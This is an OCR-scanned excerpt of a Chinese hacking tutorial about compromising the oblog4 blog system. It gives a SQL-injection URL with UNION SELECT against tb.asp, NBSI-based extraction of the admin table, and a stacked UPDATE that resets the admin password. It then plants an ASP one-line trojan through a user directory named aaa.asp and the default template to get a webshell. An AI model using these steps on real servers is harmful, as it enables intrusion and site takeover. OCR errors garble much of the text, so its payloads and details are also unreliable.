如发现有乱码，请点击下面链接浏览原文
正文摘录:

好了，可以注入，我们来看能不能够union查询，提交http：／／Iocalhost：88／oblog4／tb.asp?id。1end1=2unionselect1fromoblog—adminwhereid=1&urI=http：／www.sine.com&blog—name=风尘浪子&title：好文章&excerpt=不错啊，如图3，出错了，似乎字段类型不一致。没办法，我们来猜解密码，想了想发现这个注入点除了返回信息有一点点不同凡响外，其它的没什么特别的。手工测试太累人了，还是交给nbsi好了，把注入地址变化一下，变成httP：／／www.oblog.Gem.cn／tb.asp?url=http：／／www·slna-com&blog—name=风尘浪子&title----好文章&excerpt=不错啊&id=1。0blog的表名(Y—oblog—admin)比较特别，nbsi自带的表名里面默认是没有的，我们需要手工加上，字段(Y—password、Y—username、Yid)也需要手工加上，加上判断的关键字“TrUe”，一分钟不到，nbSi图4接下来做什么呢?当然是破解md5密文进入后台拿webshell了，我们可以选择md5cracker破解也可以试试md5网站查询，这就要看各位的运气了，谁也帮~gTi(t。如果是Sql的商业版本0b10g，我们就没有必要那么麻烦了，直接update修改管理员密码：httP：／／WWW.0b10g.C0m.cn／tb.asP?id=1；uPdSteOblogadminsetpassword=’469e80d32c0559f8’whereid=l一一&url=http：／www.sine.com&blog—name=风尘浪子&title=好文章&excerpt=不错啊，剩下的就是直接闯进后台，在后台可以看到web绝对路径，sql的版本可以直接差异备份数据库得到webShell。由于本人没有sql的商业版本，也就没有去测试了。好了，假设大家已经进人了后台，现在正式拿webshell。到网上去搜索“oblog4后台拿webshell的办法”，千篇一律的都是讲后台添加“gilljpglpngIbmplrar1ziplswfJdoclaaaspspaspsp”的上传后缀，估计这种办法又是针对很古老的版本，如今的0b10g进入后台后根本找不到设置上传文件类型的地方。再看备份数据库和恢复数据库，可是我仔细看了一下admin—database·asp，里面当前数据库的路径都是从包含文件conn·asp里面获得的，我们根本没有办法控制它。再看看上传，oblog有一个用户目录的设置，记得以前有人说Win2003环境下结合上传可以拿webshell。假设我们设置一个用户目录是aaa.asp，并且设置成默认目录，我们再去前台申请一个用户，比如yunyun，那么yunyun这个用户的博客的址就是http：／／127.0.0.1：88／oblog4／aaa.asD／yunyun／index.html，我们把一个asp木马后缀改成JPg，如果我们把这个JPg上传到了aaa.asp目录或者其子目录里面，那么这个jPg格式的木马就会被执行，这一点和微软的bug有关。经过研究发现无论我们在后台上传什么东西，都是传到了UploadFiles这个目录，UploadFiles这个目录是在aaa.asp之外的目录，和aaa.asp这个目录一点的关系都没有。记得老版本的OblOg可没有这么聪明，呵呵，时代变了!最后，我终于找到了一个在Win2003环境下拿webshell的办法。首先使用管理员帐号进入后台，点击用户目录管理，添加一个用户目录aaa.asp，并且设置成默认目录，接着点击“模板管理”下面的用户模板管理，修改默认模板(文本方式)，也就是第一个模板了，修改主模板，将一句话木马＜％executerequest图5接着登录前台，注册一个新用户，访问自己的博客首页，首页已经变成木马了。最后当然就是上传大马，控制服务器了，如图6，图7。怎么样，是不是很简单，win2003的服务器我们就这样拿到webshell了，至于Win2000服务器到目前